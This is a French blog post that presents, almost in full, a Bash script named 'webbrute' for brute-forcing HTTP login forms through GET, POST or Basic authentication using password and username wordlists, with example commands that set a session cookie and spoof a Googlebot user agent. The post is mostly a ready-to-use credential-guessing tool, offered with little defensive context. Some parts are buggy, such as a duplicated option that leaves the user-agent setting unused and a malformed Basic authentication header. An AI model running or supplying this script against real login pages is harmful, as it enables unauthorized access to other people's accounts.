Mots clés :  
  web 
  
  php 
  
  security 
 
Cet article présente un script Bash de bruteforce sur le protocol HTTP via les méthodes GET/POST & BASIC






0x01. WEBBRUTE
 
#!/bin/bash
 
 
 
#
# Settings, do not edit this, variables can be set using parameters
#
APP="webbrute"
VERBOSE=0
tmp="/tmp/.wget.bf"
V="\e[1;32m"
Y="\e[1;33m"
B="\e[1;29m"
N="\e[0m"
P="0"              # 0 to match, 1 to not match
 
 
 
#
# Synopsis
#
function usage
{
  echo "
Usage  : $APP <-u url> <-d get-data> <-f dictionary> <-p pattern> [-c cookie] [-v] [-i] [-P|-B] [-U useragent]
 
 -d  GET/POST data
 -f  dictionary file
 -p  pattern to match
 -i  mismatch patter instead of match
 -c  cookie data
 -v  verbose
 -P  use post instead of get method
 -B  use basic authenticaton instead of get method
 -U  set useragent, default is : 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
 
 
Exemple:
 
$APP -u 'http://localhost/bfme.php' -u 'http://192.168.0.1' -d 'pass=FUZZPASS' -f passwords.lst -p BIENVENUE
 
> GET authentication bruteforce, using one field
 
 
$APP -u 'http://localhost/bfme.php' -u 'http://192.168.0.1' -d 'admin=FUZZUSER&pass=FUZZPASS&submit=Login' -f passwords.lst,usernames.lst \
 -p Incorrect -i -c 'PHPSESSID=123456789; Date=123456789;' -P -U 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
 
> POST athentication bruteforce (-P), too file are needed to brutefroce login/pass (passwords.lst,usernames.lst),
if not match (-i) Incorrect then login success, use custom cookie and custom useragent
 
"
  exit $1
}
 
 
[ $# -eq 0 ]  && usage 0
[ $# -gt 15 ] && usage 1
[ $# -lt 8 ]  && usage 1
 
 
# Empty values ... 
data="" ; url="" ; file="" ; pattern="" ; cookie=""
 
# Default action : GET
post=0 ; basic=0
 
# Default useragent
useragent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)"
 
# Number of words
i=0
 
# Parse arguments
while getopts "d:u:f:p:c:ihvwPBU:" option
do
  case $option in 
    d)  data=$OPTARG 
    ;;
 
    u)  url=$OPTARG 
    ;;
 
    f)  file=$OPTARG
    ;;
 
    p)  pattern=$OPTARG
    ;;
 
    c)  cookie="--header 'Cookie: $OPTARG'"
    ;;
 
    v)  VERBOSE=1
    ;;
 
    i)  P="1"
    ;;
 
    P)  post=1  ; basic=0
    ;;
 
    B)  basic=1 ; post=0
    ;;
 
    u)  useragent=$OPTARG
    ;;
 
    h)  usage 0
    ;;
  esac
done
 
 
 
#
# Parse data
#
F=0
field_user=$(echo $data |grep -oE "([a-z]){1,}=FUZZUSER" |cut -d'=' -f1) 
[ -z $field_user ] && F=1
field_pass=$(echo $data |grep -oE "([a-z]){1,}=FUZZPASS" |cut -d'=' -f1) 
[ ! -z $field_user ] && [ ! -z $field_pass ] && F=2
field_data=$(echo $data |cut -d'&' -f3-)
[ $F -eq 0 ] && usage 1
[ $basic -eq 1 ] && action="BASIC"
[ $post  -eq 1 ] && action="POST"
[ $basic -eq 0 -a $post -eq 0 ] && action="GET"
 
 
#
# Bruteforce one field : pass
#
if [ $F -eq 1 ] ; then
 
  numline=$(cat -b $file |awk  {'print $1'} |grep -oE "^([0-9]){1,}" |tail -n 1)
 
  echo
  while read BF_PASS
  do
 
    i=$((i+1))
    printf "\r[$action]  Tried : %5s passes / %5s  " "$i" "$numline"
    [ $VERBOSE -ne 0 ] && printf "\t $field_user= %-20s $field_pass= %-30s" "$BF_USER" "$BF_PASS"
 
    if [ $post -eq 1 ]; then
      wget -q --user-agent "$useragent" $cookie --post-data="$field_pass=$BF_PASS&$field_data" "$url" -O -|\
       grep -iE "$pattern" >/dev/null 2>&1 ; e=$?
    elif [ $basic -eq 1 ]; then
      B64_DATA=$(printf "$BF_PASS"|base64)
      wget -q --user-agent "$useragent" $cookie --header="Authorization: Basic $B64_DATA" "$url" -O -|\
       grep -iE "$pattern" >/dev/null 2>&1 ; e=$?
    else
      wget -q --user-agent "$useragent" $cookie "$url?$field_pass=$BF_PASS&$field_data" -O -|\
       grep -iE "$pattern" >/dev/null 2>&1 ; e=$?
    fi
 
    if [ $e -eq $P ] ; then
      [ $i -eq 1 ] && printf "\n\n$Y""Warning: potential wrong positive detected. Please check arguments.$N"
      printf "\n\nFound: $B$field_pass$N = $V $BF_PASS$N\n\n"
      break
    fi
 
  done < $file
 
fi
 
 
 
#
# Bruteforce two fields : user & pass
#
if [ $F -eq 2 ] ; then
 
  file_user=$(echo $file|cut -d',' -f1)
  file_pass=$(echo $file|cut -d',' -f2)
  num_user=$(cat -b $file_user|tail -n1|awk '{ print $1 }')
  num_pass=$(cat -b $file_pass|tail -n1|awk '{ print $1 }')
  numline=$((num_user*num_pass))
 
  echo
  while read BF_USER
  do
 
    while read BF_PASS
    do
 
      i=$((i+1))
      printf "\r[$action]  Tried : %5s passes / %5s  " "$i" "$numline"
      [ $VERBOSE -ne 0 ] && printf "\t $field_user= %-20s $field_pass= %-30s" "$BF_USER" "$BF_PASS"
 
      if [ $post -eq 1 ]; then
        wget -q --user-agent "$useragent" $cookie --post-data="$field_user=$BF_USER&$field_pass=$BF_PASS&$field_data" "$url" -O -|\
         grep -iE "$pattern" >/dev/null 2>&1 ; e=$?
      elif [ $basic -eq 1 ]; then
        B64_DATA=$(printf "$field_user=$BF_USER&$field_pass=$BF_PASS"|base64)
        wget -q --user-agent "$useragent" $cookie --header="Authorization: Basic $B64_DATA" "$url" -O -|\
         grep -iE "$pattern" >/dev/null 2>&1 ; e=$?
      else
        wget -q --user-agent "$useragent" $cookie "$url?$field_user=$BF_USER&$field_pass=$BF_PASS&$field_data" -O -|\
         grep -iE "$pattern" >/dev/null 2>&1 ; e=$?
      fi
 
 
      if [ $e -eq $P ] ; then
        [ $i -eq 1 ] && printf "\n\n$Y""Warning: potential wrong positive detected. Please check arguments.$N"
        printf "\n\nFound: $B$field_user$N = $V $BF_USER$N \t $B$field_pass$N = $V $BF_PASS$N\n\n"
        exit
      fi
 
    done < $file_pass
 
  done < $file_user
 
fi
 
 
 
#
# Nice style
#
printf "\n\n"
 
 


   =>   Écrit par : Nicolas, le 07 juillet 2014


 
Mots clés :  
  web 
  
  php 
  
  security 
    >   Articles connexes :

HTTP Server, tell me who you are ?

Discuter avec un serveur web *apparement* muet ? Voici comment faire...

TLD et Indexes téléphoniques

TLD et Indexes téléphoniques


Troll The Lamer

Troll The Lamer


Se protéger des injections SQL

Se protéger des injections SQL


/tmp et /var/log en noexec sur macOS

/tmp et /var/log en noexec sur macOS


Durcissement de Windows

Durcissement de Windows


5697610